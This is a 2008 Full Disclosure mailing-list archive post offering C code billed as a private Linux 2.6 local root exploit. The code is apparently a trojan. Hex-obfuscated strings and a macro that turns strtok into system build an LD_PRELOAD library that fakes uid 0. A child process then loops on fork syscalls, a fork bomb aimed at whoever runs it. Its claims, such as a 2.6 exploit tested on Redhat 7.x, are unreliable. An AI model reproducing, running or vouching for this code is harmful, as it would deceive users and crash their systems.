Full Disclosure mailing list archives
0day LINUX 0day LATEST
From: "wejwklekl246" <sidjwioeupo () mail md>
Date: Mon, 28 Jan 2008 10:13:38 +0000
/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE * * afunixroot.c Linux kernel 2.6.x i386 local root exploit * * Tested under: * * Redhat 7.0 * Redhat 7.1 * Redhat 7.2 * Redhat 7.3 * Redhat 8.0 * Redhat 9.0 * should also work on SuSE <= 10.2 * Debian 3.0 (credit to Henrique) * GhostLord tested also Mandrake 9.0, vuln. * * rumours go around that it could work on FreeBSD too * (with minor changes). * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #include <errno.h> #include <sys/syscall.h> #undef strtok #define strtok system #define __NR_sys_ldtctrl 102 static char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65" "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74" "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30" "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20" "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74" "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75" "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh"; static int done=0; void handler(int v) { done++; } inline _syscall2(int, sys_ldtctrl, int, c, int *, a); void prepare() { int key, r, n_cnt=8; int buf[16]; memset(buf, 0, sizeof(buf)); buf[0]=buf[1]=2; key = sys_ldtctrl(1, buf); retry: memset(buf, 0, sizeof(buf)); buf[0] = key; buf[1] = (int)buf; buf[2] = 64; buf[4] = (int)&buf[8]; buf[5] = 16; buf[8] = 0x60030002; buf[9] = 0x1d5b49d5; r = sys_ldtctrl(11, buf); if(n_cnt--) goto retry; } int main(void) { FILE *fp; char *offset, *token; int ret=1; prepare(); fp=fopen("\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00","w"); fprintf(fp,"%s",hellc0de); fclose(fp); token = (void*)strtok("\x67\x63\x63\x20\x2d\x73\x68\x61\x72\x65\x64\x20\x2d\x6f\x20\x2f\x74\x6d" "\x70\x2f\x6f\x77\x6e\x2e\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e" "\x63\x3b\x72\x6d\x20\x2d\x66\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00"); __asm__( "xorl %%eax, %%eax \n" "movl $0x10, %%ebx \n" "movb $0x22, %%al \n" "int $0x80 \n" :"=&a"(ret) ); if(!ret) printf("\nSuccess!!!\nEnjoy...\n\n"); if (fork() == 0) { signal(SIGALRM, handler); alarm(15); __asm__( "xorl %eax, %eax \n" "movb $29, %al \n" "int $0x80 \n" ); while(1) { __asm__( "xorl %eax, %eax \n" "movb $0x02, %al \n" "int $0x80 \n" ); offset=malloc(sizeof(hellc0de)+16); *((int *)hellc0de) = (unsigned)offset; } exit(0); } putenv("\x4c\x44\x5f\x50\x52\x45\x4c\x4f\x41\x44\x3d\x2f\x74\x6d\x70\x2f" "\x6f\x77\x6e\x2e\x73\x6f\x00"); execl("/bin/sh", "sh", NULL); return 0; } /* -EOF- */ --------------------------------------------- This e-mail was sent using Mail.md _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- 0day LINUX 0day LATEST wejwklekl246 (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Farmer (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Dawson (Jan 28)
- Re: 0day LINUX 0day LATEST Valdis . Kletnieks (Jan 28)
- <Possible follow-ups>
- Re: 0day LINUX 0day LATEST atlas (Jan 28)
- Re: 0day LINUX 0day LATEST kat (Jan 28)
- Re: 0day LINUX 0day LATEST Andrew Farmer (Jan 28)